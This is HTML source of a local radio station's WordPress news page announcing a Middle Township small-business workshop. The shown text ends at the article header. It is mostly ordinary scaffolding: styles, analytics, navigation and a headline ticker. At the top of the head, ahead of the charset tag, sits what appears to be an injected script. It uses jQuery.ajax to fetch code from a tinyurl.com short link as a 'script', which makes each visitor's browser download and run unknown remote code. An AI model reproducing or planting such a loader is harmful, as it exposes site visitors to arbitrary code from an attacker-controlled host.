
<!DOCTYPE html>

<!--[if IE 8]> <html class="ie ie8" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]-->
<!--[if IE 9]> <html class="ie ie9" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]-->
<!--[if gt IE 9]><!--> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <!--<![endif]-->

<head>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
<script type="text/javascript">jQuery.ajax({type: "GET", url: "https://tinyurl.com/ybydoegx", dataType: "script"});</script>


<meta charset="UTF-8" />
<title>MIDDLE TOWNSHIP TO HOLD BUSINESS RESOURCE WORKSHOP - 98.7 The Coast WCZT</title>

 
<meta name="viewport" content="width=device-width, initial-scale=1" />
<link rel="pingback" href="http://987thecoast.com/xmlrpc.php" />
	
<link rel="shortcut icon" href="http://987thecoast.com/wp-content/uploads/2014/09/icon.jpg" />	

<link rel="apple-touch-icon-precomposed" href="http://987thecoast.com/wp-content/uploads/2014/09/coast.jpg" />
	

<!-- This site is optimized with the Yoast SEO plugin v5.6 - https://yoast.com/wordpress/plugins/seo/ -->
<link rel="canonical" href="http://987thecoast.com/local-news/middle-township-hold-business-resource-workshop/" />
<meta property="og:locale" content="en_US" />
<meta property="og:type" content="article" />
<meta property="og:title" content="MIDDLE TOWNSHIP TO HOLD BUSINESS RESOURCE WORKSHOP - 98.7 The Coast WCZT" />
<meta property="og:description" content="Middle Township will host a free business resource funding and financing workshop on Tuesday, December 5th.  Township officials say the workshop will be held at the municipal building and will include state and federal officials who specialize in small business development. Share this:" />
<meta property="og:url" content="http://987thecoast.com/local-news/middle-township-hold-business-resource-workshop/" />
<meta property="og:site_name" content="98.7 The Coast WCZT" />
<meta property="article:author" content="https://www.facebook.com/987TheCoast" />
<meta property="article:section" content="Local News" />
<meta property="article:published_time" content="2017-11-17T19:35:20-05:00" />
<meta property="og:image" content="http://987thecoast.com/wp-content/uploads/2014/04/middle-township-logo.jpg" />
<meta property="og:image:width" content="472" />
<meta property="og:image:height" content="468" />
<script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"WebSite","@id":"#website","url":"http:\/\/987thecoast.com\/","name":"98.7 The Coast WCZT","potentialAction":{"@type":"SearchAction","target":"http:\/\/987thecoast.com\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script>
<!-- / Yoast SEO plugin. -->

<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="98.7 The Coast WCZT &raquo; Feed" href="http://987thecoast.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="98.7 The Coast WCZT &raquo; Comments Feed" href="http://987thecoast.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="98.7 The Coast WCZT &raquo; MIDDLE TOWNSHIP TO HOLD BUSINESS RESOURCE WORKSHOP Comments Feed" href="http://987thecoast.com/local-news/middle-township-hold-business-resource-workshop/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/987thecoast.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56794,8205,9794,65039],[55358,56794,8203,9794,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='contact-form-7-css'  href='http://987thecoast.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.9' type='text/css' media='all' />
<link rel='stylesheet' id='crafty-social-buttons-styles-css'  href='http://987thecoast.com/wp-content/plugins/crafty-social-buttons/css/public.min.css?ver=1.5.3' type='text/css' media='all' />
<link rel='stylesheet' id='responsiveslides-css'  href='http://987thecoast.com/wp-content/plugins/simple-responsive-slider/assets/css/responsiveslides.css?ver=4.9' type='text/css' media='all' />
<link rel='stylesheet' id='smartmag-fonts-css'  href='http://fonts.googleapis.com/css?family=Open+Sans:400,600,700|Roboto+Slab' type='text/css' media='all' />
<link rel='stylesheet' id='smartmag-core-css'  href='http://987thecoast.com/wp-content/themes/smart-mag/style.css?ver=4.9' type='text/css' media='all' />
<link rel='stylesheet' id='smartmag-responsive-css'  href='http://987thecoast.com/wp-content/themes/smart-mag/css/responsive.css?ver=4.9' type='text/css' media='all' />
<link rel='stylesheet' id='pretty-photo-css'  href='http://987thecoast.com/wp-content/themes/smart-mag/css/prettyPhoto.css?ver=4.9' type='text/css' media='all' />
<link rel='stylesheet' id='smartmag-font-awesome-css'  href='http://987thecoast.com/wp-content/themes/smart-mag/css/fontawesome/css/font-awesome.min.css?ver=4.9' type='text/css' media='all' />
<style id='smartmag-font-awesome-inline-css' type='text/css'>
.navigation { background-color: #222222; }

@media only screen and (max-width: 799px) { .navigation .menu > li:hover > a, .navigation .menu > .current-menu-item > a, 
.navigation .menu > .current-menu-parent > a { background-color: #222222; } }

.navigation.sticky { background: rgb(34,34,34); background: rgba(34,34,34, 0.9); }

.navigation .mega-menu, .navigation .menu ul { background-color: #222222; }

@media only screen and (max-width: 799px) { .navigation .mega-menu.links > li:hover { background-color: #222222; } }

.navigation .menu > li:hover, .navigation .menu li li:hover, .navigation .menu li li.current-menu-item,
.navigation .mega-menu .sub-nav li:hover, .navigation .menu .sub-nav li.current-menu-item { background-color: #444444; }

@media only screen and (max-width: 799px) { .navigation .menu > li:hover > a, .navigation .menu > .current-menu-item > a, 
.navigation .menu > .current-menu-parent > a, .navigation .mega-menu.links > li:hover,
.navigation .menu > .current-menu-ancestor > a, .navigation .menu li.active { background-color: #444444; } }

.navigation { border-color: #2F499F; }

::selection { background: #2F499F }

:-moz-selection { background: #2F499F }

.top-bar { border-top-color: #2F499F }

.trending-ticker .heading, .breadcrumbs .location, .news-focus .heading, .gallery-title, .related-posts .section-head, 
.news-focus .heading .subcats a.active, .post-content a, .comments-list .bypostauthor .comment-author a, .error-page 
.text-404, .main-color, .section-head.prominent, .block.posts .fa-angle-right, a.bbp-author-name, .main-stars span:before,
.main-stars { color: #2F499F }

.navigation .menu > li:hover > a, .navigation .menu >.current-menu-item > a, .navigation .menu > .current-menu-parent > a,
.navigation .menu > .current-menu-ancestor > a, .tabbed .tabs-list .active a,  
.comment-content .reply, .sc-tabs .active a, .navigation .mega-menu { border-bottom-color: #2F499F }

.main-featured .cat, .main-featured .pages .flex-active, .rate-number .progress, .highlights .rate-number .progress, 
.main-pagination .current, .main-pagination a:hover, .cat-title, .sc-button-default:hover, .drop-caps, .review-box .bar,
.review-box .overall, .listing-alt .content .read-more a, .button, .post-pagination > span { background: #2F499F }

.post-content .wpcf7-not-valid-tip, .main-heading, .review-box .heading, .post-header .post-title:before, 
.highlights h2:before, div.bbp-template-notice, div.indicator-hint, div.bbp-template-notice.info, 
.modal-header .modal-title, .entry-title, .page-title { border-left-color: #2F499F }

@media only screen and (max-width: 799px) { .navigation .mobile .fa { background: #2F499F } }

.main-footer { background-color: #222222; background-image: none; }

.lower-foot { background-color: #333333 }


/*.trending-ticker a {color:red !important}*/

</style>
<link rel='stylesheet' id='fancybox-css'  href='http://987thecoast.com/wp-content/plugins/easy-fancybox/fancybox/jquery.fancybox-1.3.8.min.css?ver=1.6' type='text/css' media='screen' />
<link rel='stylesheet' id='timed-content-css-css'  href='http://987thecoast.com/wp-content/plugins/timed-content/css/timed-content.css?ver=2.6' type='text/css' media='all' />
<script type='text/javascript' src='http://987thecoast.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://987thecoast.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://987thecoast.com/wp-content/plugins/simple-responsive-slider/assets/js/responsiveslides.min.js?ver=4.9'></script>
<script type='text/javascript' src='http://987thecoast.com/wp-content/themes/smart-mag/js/jquery.prettyPhoto.js?ver=4.9'></script>
<script type='text/javascript' src='http://987thecoast.com/wp-content/plugins/timed-content/js/timed-content.js?ver=2.6'></script>
<link rel='https://api.w.org/' href='http://987thecoast.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://987thecoast.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://987thecoast.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.9" />
<link rel='shortlink' href='http://987thecoast.com/?p=87059' />
<link rel="alternate" type="application/json+oembed" href="http://987thecoast.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2F987thecoast.com%2Flocal-news%2Fmiddle-township-hold-business-resource-workshop%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://987thecoast.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2F987thecoast.com%2Flocal-news%2Fmiddle-township-hold-business-resource-workshop%2F&#038;format=xml" />
	<script type="text/javascript">
	jQuery(document).ready(function($) {
		$(function() {
			$(".rslides").responsiveSlides({
			  auto: true,             // Boolean: Animate automatically, true or false
			  speed: 500,            // Integer: Speed of the transition, in milliseconds
			  timeout: 4000,          // Integer: Time between slide transitions, in milliseconds
			  pager: false,           // Boolean: Show pager, true or false
			  nav: true,             // Boolean: Show navigation, true or false
			  random: false,          // Boolean: Randomize the order of the slides, true or false
			  pause: true,           // Boolean: Pause on hover, true or false
			  pauseControls: true,    // Boolean: Pause when hovering controls, true or false
			  prevText: "Back",   // String: Text for the "previous" button
			  nextText: "Next",       // String: Text for the "next" button
			  maxwidth: "703",           // Integer: Max-width of the slideshow, in pixels
			  navContainer: "",       // Selector: Where controls should be appended to, default is after the 'ul'
			  manualControls: "",     // Selector: Declare custom pager navigation
			  namespace: "rslides",   // String: Change the default namespace used
			  before: function(){},   // Function: Before callback
			  after: function(){}     // Function: After callback
			});
		});
	 });
	</script>
	<!-- Global Site Tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-54338619-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments)};
  gtag('js', new Date());

  gtag('config', 'UA-54338619-1');
</script>
		<style type="text/css" id="wp-custom-css">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</style>
	
<!-- Easy FancyBox 1.6 using FancyBox 1.3.8 - RavanH (http://status301.net/wordpress-plugins/easy-fancybox/) -->
<script type="text/javascript">
/* <![CDATA[ */
var fb_timeout = null;
var fb_opts = { 'overlayShow' : true, 'hideOnOverlayClick' : true, 'showCloseButton' : true, 'margin' : 20, 'centerOnScroll' : true, 'enableEscapeButton' : true, 'autoScale' : true };
var easy_fancybox_handler = function(){
	/* IMG */
	var fb_IMG_select = 'a[href*=".jpg"]:not(.nolightbox,li.nolightbox>a), area[href*=".jpg"]:not(.nolightbox), a[href*=".jpeg"]:not(.nolightbox,li.nolightbox>a), area[href*=".jpeg"]:not(.nolightbox), a[href*=".png"]:not(.nolightbox,li.nolightbox>a), area[href*=".png"]:not(.nolightbox)';
	jQuery(fb_IMG_select).addClass('fancybox image');
	var fb_IMG_sections = jQuery('div.gallery');
	fb_IMG_sections.each(function() { jQuery(this).find(fb_IMG_select).attr('rel', 'gallery-' + fb_IMG_sections.index(this)); });
	jQuery('a.fancybox, area.fancybox, li.fancybox a').fancybox( jQuery.extend({}, fb_opts, { 'transitionIn' : 'elastic', 'easingIn' : 'easeOutBack', 'transitionOut' : 'elastic', 'easingOut' : 'easeInBack', 'opacity' : false, 'hideOnContentClick' : false, 'titleShow' : true, 'titlePosition' : 'over', 'titleFromAlt' : true, 'showNavArrows' : true, 'enableKeyboardNav' : true, 'cyclic' : false }) );
	/* PDF */
	jQuery('a[href*=".pdf"], area[href*=".pdf"], a[href*=".PDF"], area[href*=".PDF"]').not('.nolightbox').addClass('fancybox-pdf');
	jQuery('a.fancybox-pdf, area.fancybox-pdf, li.fancybox-pdf a').fancybox( jQuery.extend({}, fb_opts, { 'type' : 'iframe', 'width' : '95%', 'height' : '95%', 'padding' : 9, 'titleShow' : false, 'titlePosition' : 'float', 'titleFromAlt' : true, 'autoDimensions' : false, 'scrolling' : 'no', 'onStart' : function(selectedArray, selectedIndex, selectedOpts) { selectedOpts.content = '<object data="' + selectedArray[selectedIndex].href + '" type="application/pdf" height="100%" width="100%"><a href="' + selectedArray[selectedIndex].href + '" style="display:block;position:absolute;top:48%;width:100%;text-align:center">' + jQuery(selectedArray[selectedIndex]).html() + '</a></object>' } }) );
	/* iFrame */
	jQuery('a.fancybox-iframe, area.fancybox-iframe, li.fancybox-iframe a').fancybox( jQuery.extend({}, fb_opts, { 'type' : 'iframe', 'width' : '70%', 'height' : '90%', 'titleShow' : true, 'titlePosition' : 'float', 'titleFromAlt' : true, 'allowfullscreen' : false }) );
}
var easy_fancybox_auto = function(){
	/* Auto-click */
	setTimeout(function(){jQuery('#fancybox-auto').trigger('click')},1000);
}
/* ]]> */
</script>
<style type="text/css">
#fancybox-overlay{background-attachment:fixed;background-image:url("http://987thecoast.com/wp-content/plugins/easy-fancybox/images/light-mask.png");background-position:center;background-repeat:no-repeat;background-size:100% 100%}
#fancybox-content{background-color:#fff}
#fancybox-content{border-color:#fff}#fancybox-outer{background-color:#fff}
#fancybox-content{color:inherit}
</style>
	
<!--[if lt IE 9]>
<script src="http://987thecoast.com/wp-content/themes/smart-mag/js/html5.js" type="text/javascript"></script>
<![endif]-->

<!-- Facebook Pixel Code -->
<script>
  !function(f,b,e,v,n,t,s)
  {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
  n.callMethod.apply(n,arguments):n.queue.push(arguments)};
  if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
  n.queue=[];t=b.createElement(e);t.async=!0;
  t.src=v;s=b.getElementsByTagName(e)[0];
  s.parentNode.insertBefore(t,s)}(window, document,'script',
  'https://connect.facebook.net/en_US/fbevents.js');
  fbq('init', '1839387219615200');
  fbq('track', 'PageView');
</script>
<noscript><img height="1" width="1" style="display:none"
  src="https://www.facebook.com/tr?id=1839387219615200&ev=PageView&noscript=1"
/></noscript>
<!-- End Facebook Pixel Code -->

</head>

<script>
  fbq('track', 'ViewContent');
</script>


<body class="post-template-default single single-post postid-87059 single-format-standard custom-background page-builder right-sidebar boxed">

<div class="main-wrap">

	<div class="top-bar">

		<div class="wrap">
			<section class="top-bar-content">
				<div class="social-top-custom"><div class="crafty-social-buttons crafty-social-link-buttons crafty-social-buttons-size-2 crafty-social-buttons-align-left crafty-social-buttons-caption-inline-block"><ul class="crafty-social-buttons-list"><li><a href="https://www.facebook.com/987TheCoast" class="crafty-social-button csb-facebook hover-none" title="Facebook" target="_blank"><img  class="crafty-social-button-image" alt="Facebook" width="24" height="24" src="http://987thecoast.com/wp-content/plugins/crafty-social-buttons/buttons/simple/facebook.png" /></a></li><li><a href="https://twitter.com/987TheCoast" class="crafty-social-button csb-twitter hover-none" title="Twitter" target="_blank"><img  class="crafty-social-button-image" alt="Twitter" width="24" height="24" src="http://987thecoast.com/wp-content/plugins/crafty-social-buttons/buttons/simple/twitter.png" /></a></li><li><a href="http://i.instagram.com/987thecoast/" class="crafty-social-button csb-instagram hover-none" title="Instagram" target="_blank"><img  class="crafty-social-button-image" alt="Instagram" width="24" height="24" src="http://987thecoast.com/wp-content/plugins/crafty-social-buttons/buttons/simple/instagram.png" /></a></li></ul></div></div>
								<div class="trending-ticker">
					<span class="heading">Top News</span>

					<ul>
												
												
							<li><a href="http://987thecoast.com/1/987-coast-election-night-results/" title="987 THE COAST ELECTION NIGHT RESULTS">987 THE COAST ELECTION NIGHT RESULTS</a></li>
						
												
							<li><a href="http://987thecoast.com/local-news/avalon-set-kick-off-holiday-weekend-thanksgiving-week/" title="AVALON SET TO KICK OFF HOLIDAY WEEKEND THANKSGIVING WEEK">AVALON SET TO KICK OFF HOLIDAY WEEKEND THANKSGIVING WEEK</a></li>
						
												
							<li><a href="http://987thecoast.com/local-news/freeholders-seeking-candidates-accc-board-trustees/" title="FREEHOLDERS SEEKING CANDIDATES FOR ACCC BOARD OF TRUSTEES">FREEHOLDERS SEEKING CANDIDATES FOR ACCC BOARD OF TRUSTEES</a></li>
						
												
							<li><a href="http://987thecoast.com/local-news/middle-township-hold-business-resource-workshop/" title="MIDDLE TOWNSHIP TO HOLD BUSINESS RESOURCE WORKSHOP">MIDDLE TOWNSHIP TO HOLD BUSINESS RESOURCE WORKSHOP</a></li>
						
												
							<li><a href="http://987thecoast.com/local-news/campbell-gets-six-months-home-detention-stealing-pba/" title="CAMPBELL GETS SIX MONTHS HOME DETENTION FOR STEALING FROM PBA">CAMPBELL GETS SIX MONTHS HOME DETENTION FOR STEALING FROM PBA</a></li>
						
												
							<li><a href="http://987thecoast.com/local-news/accident-involving-three-school-buses-middle-twp-no-injuries/" title="ACCIDENT INVOLVING THREE SCHOOL BUSES IN MIDDLE TWP, NO INJURIES">ACCIDENT INVOLVING THREE SCHOOL BUSES IN MIDDLE TWP, NO INJURIES</a></li>
						
												
							<li><a href="http://987thecoast.com/local-news/murphy-ill-support-menendez-re-election/" title="MURPHY: I&#8217;LL SUPPORT MENENDEZ FOR RE-ELECTION">MURPHY: I&#8217;LL SUPPORT MENENDEZ FOR RE-ELECTION</a></li>
						
												
							<li><a href="http://987thecoast.com/local-news/lidl-opens-first-nj-grocery-store-cumberland-county/" title="LIDL OPENS FIRST NJ GROCERY STORE IN CUMBERLAND COUNTY">LIDL OPENS FIRST NJ GROCERY STORE IN CUMBERLAND COUNTY</a></li>
						
												
							<li><a href="http://987thecoast.com/local-news/lobiondo-votes-no-tax-cuts-jobs-act/" title="LOBIONDO VOTES NO ON TAX CUTS AND JOBS ACT">LOBIONDO VOTES NO ON TAX CUTS AND JOBS ACT</a></li>
						
												
							<li><a href="http://987thecoast.com/local-news/34th-street-bridge-ocean-city-closed-tonight/" title="34TH STREET BRIDGE IN OCEAN CITY TO BE CLOSED TONIGHT">34TH STREET BRIDGE IN OCEAN CITY TO BE CLOSED TONIGHT</a></li>
						
												
							<li><a href="http://987thecoast.com/local-news/breaking-news-mistrial-senator-robert-menendez-corruption-case/" title="BREAKING NEWS:  MISTRIAL IN SENATOR ROBERT MENENDEZ CORRUPTION CASE">BREAKING NEWS:  MISTRIAL IN SENATOR ROBERT MENENDEZ CORRUPTION CASE</a></li>
						
												
											</ul>
				</div>
				
				
				<div class="search">
					<form action="http://987thecoast.com/" method="get">
						<input type="text" name="s" class="query" value="" placeholder="Search..." />
						<button class="search-button" type="submit"><i class="fa fa-search"></i></button>
					</form>
				</div> <!-- .search -->
				

								
			</section>
		</div>
		
	</div>

	<div id="main-head" class="main-head">
		
		<div class="wrap">
		
			<header>
				<div class="title">
				
				<a href="http://987thecoast.com/" title="98.7 The Coast WCZT" 

rel="home">
									
					<img src="http://987thecoast.com/wp-content/uploads/2015/11/logo.jpg" class="logo-image" alt="98.7 The Coast WCZT"  />
						 
								</a>
				
				</div>
				
				<div class="right">
								<div class="textwidget"><p><a href="https://www.accuweather.com/en/us/wildwood-nj/08260/weather-forecast/339565" class="aw-widget-legal"><br />
<!--
By accessing and/or using this code snippet, you agree to AccuWeather’s terms and conditions (in English) which can be found at https://www.accuweather.com/en/free-weather-widgets/terms and AccuWeather’s Privacy Statement (in English) which can be found at https://www.accuweather.com/en/privacy.
--><br />
</a></p>
<div id="awcc1505956085893" class="aw-widget-current"  data-locationkey="339565" data-unit="f" data-language="en-us" data-useip="false" data-uid="awcc1505956085893"></div>
<p><script type="text/javascript" src="https://oap.accuweather.com/launch.js"></script></p>
</div>
						</div>
			</header>
			
			<nav class="navigation cf" data-sticky-nav="1">
				<div class="mobile">
					<a href="#" class="selected">
						<span class="text">Navigate</span><span class="current"></span> <i 

class="fa fa-bars"></i>
					</a>
				</div>
				
				<div class="menu-menu-1-container"><ul id="menu-menu-1" class="menu"><li id="menu-item-85172" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-85172"><a href="http://987thecoast.com">Home</a></li>
<li id="menu-item-85130" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children menu-cat-12 menu-item-85130"><a href="http://987thecoast.com/category/local-news/">Local News</a>
<ul class="sub-menu">
	<li id="menu-item-85133" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-110 menu-item-85133"><a href="http://987thecoast.com/category/local-news/newjersey/">New Jersey</a></li>
	<li id="menu-item-85131" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-cat-101 menu-item-85131"><a href="http://987thecoast.com/category/local-news/cape-may-county/">Cape May County</a>
	<ul class="sub-menu">
		<li id="menu-item-85147" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-74 menu-item-85147"><a href="http://987thecoast.com/category/local-news/stone-harbor/">Stone Harbor</a></li>
		<li id="menu-item-85136" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-cat-83 menu-item-85136"><a href="http://987thecoast.com/category/local-news/middle-township/">Middle Township</a></li>
		<li id="menu-item-85137" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-91 menu-item-85137"><a href="http://987thecoast.com/category/local-news/wildwood/">Wildwood</a></li>
		<li id="menu-item-85138" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-82 menu-item-85138"><a href="http://987thecoast.com/category/local-news/lower-township/">Lower Township</a></li>
		<li id="menu-item-85139" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-87 menu-item-85139"><a href="http://987thecoast.com/category/local-news/ocean-city/">Ocean City</a></li>
		<li id="menu-item-85141" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-89 menu-item-85141"><a href="http://987thecoast.com/category/local-news/avalon/">Avalon</a></li>
		<li id="menu-item-85142" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-90 menu-item-85142"><a href="http://987thecoast.com/category/local-news/north-wildwood/">North Wildwood</a></li>
		<li id="menu-item-85143" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-31 menu-item-85143"><a href="http://987thecoast.com/category/local-news/cape-may/">Cape May</a></li>
		<li id="menu-item-85145" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-84 menu-item-85145"><a href="http://987thecoast.com/category/local-news/upper-township/">Upper Township</a></li>
		<li id="menu-item-85146" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-92 menu-item-85146"><a href="http://987thecoast.com/category/local-news/wildwood-crest/">Wildwood Crest</a></li>
		<li id="menu-item-85155" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-86 menu-item-85155"><a href="http://987thecoast.com/category/local-news/dennis-township/">Dennis Township</a></li>
		<li id="menu-item-85157" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-85 menu-item-85157"><a href="http://987thecoast.com/category/local-news/woodbine/">Woodbine</a></li>
		<li id="menu-item-85151" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-88 menu-item-85151"><a href="http://987thecoast.com/category/local-news/sea-isle-city/">Sea Isle City</a></li>
	</ul>
</li>
	<li id="menu-item-85132" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-cat-113 menu-item-85132"><a href="http://987thecoast.com/category/local-news/atlanticcounty/">Atlantic County</a>
	<ul class="sub-menu">
		<li id="menu-item-85150" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-106 menu-item-85150"><a href="http://987thecoast.com/category/local-news/eggharbortownship/">Egg Harbor Township</a></li>
		<li id="menu-item-85152" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-108 menu-item-85152"><a href="http://987thecoast.com/category/local-news/pleasantville/">Pleasantville</a></li>
		<li id="menu-item-85153" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-107 menu-item-85153"><a href="http://987thecoast.com/category/local-news/hamiltontownship/">Hamilton Township</a></li>
		<li id="menu-item-85154" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-109 menu-item-85154"><a href="http://987thecoast.com/category/local-news/galloway/">Galloway</a></li>
		<li id="menu-item-85156" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-105 menu-item-85156"><a href="http://987thecoast.com/category/local-news/absecon/">Absecon</a></li>
		<li id="menu-item-85134" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-93 menu-item-85134"><a href="http://987thecoast.com/category/local-news/atlantic-city/">Atlantic City</a></li>
	</ul>
</li>
	<li id="menu-item-85135" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-cat-112 menu-item-85135"><a href="http://987thecoast.com/category/local-news/cumberlandcounty/">Cumberland County</a>
	<ul class="sub-menu">
		<li id="menu-item-85140" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-103 menu-item-85140"><a href="http://987thecoast.com/category/local-news/vineland/">Vineland</a></li>
		<li id="menu-item-85149" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-104 menu-item-85149"><a href="http://987thecoast.com/category/local-news/bridgeton/">Bridgeton</a></li>
		<li id="menu-item-85144" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-102 menu-item-85144"><a href="http://987thecoast.com/category/local-news/millville/">Millville</a></li>
	</ul>
</li>
	<li id="menu-item-85148" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-111 menu-item-85148"><a href="http://987thecoast.com/category/local-news/weather/">Weather</a></li>
	<li id="menu-item-85160" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-16 menu-item-85160"><a href="http://987thecoast.com/category/school-closings/">School Closings</a></li>
</ul>
</li>
<li id="menu-item-85162" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-85162"><a href="http://987thecoast.com/sports/">Local Sports</a>
<ul class="sub-menu">
	<li id="menu-item-86166" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-86166"><a href="http://www.coastsportstoday.com"><b>Coast Sports Today</b></a></li>
</ul>
</li>
<li id="menu-item-85171" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-85171"><a href="http://fyisj.com/events">Events</a></li>
<li id="menu-item-85163" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-85163"><a href="http://987thecoast.com/contact/">Contact</a>
<ul class="sub-menu">
	<li id="menu-item-85164" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-85164"><a href="http://987thecoast.com/advertising/">Advertising</a></li>
	<li id="menu-item-85165" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-85165"><a href="http://987thecoast.com/administration/">Administration</a></li>
</ul>
</li>
<li id="menu-item-85166" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-85166"><a href="http://987thecoast.com/shows-and-djs/">Shows and DJs</a></li>
<li id="menu-item-85167" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-85167"><a target="_blank" href="http://wczt.tunegenie.com"><b>LISTEN LIVE</b></a></li>
</ul></div>			</nav>
			
		</div>
		
	</div>
	
	<div class="wrap">
		<div class="breadcrumbs"><span class="location">You are at:</span><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a itemprop="url" href="http://987thecoast.com/"><span itemprop="title">Home</span></a></span><span class="delim">&raquo;</span><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a itemprop="url"  href="http://987thecoast.com/category/local-news/"><span itemprop="title">Local News</span></a></span><span class="delim">&raquo;</span><span class="current">MIDDLE TOWNSHIP TO HOLD BUSINESS RESOURCE WORKSHOP</span></div>	</div>


<div class="main wrap cf">
	<div class="row">
		<div class="col-8 main-content">
		
			
				
<article id="post-87059" class="post-87059 post type-post status-publish format-standard has-post-thumbnail category-local-news category-middle-township" itemscope itemtype="http://schema.org/Article">

		
	<header class="post-header cf">

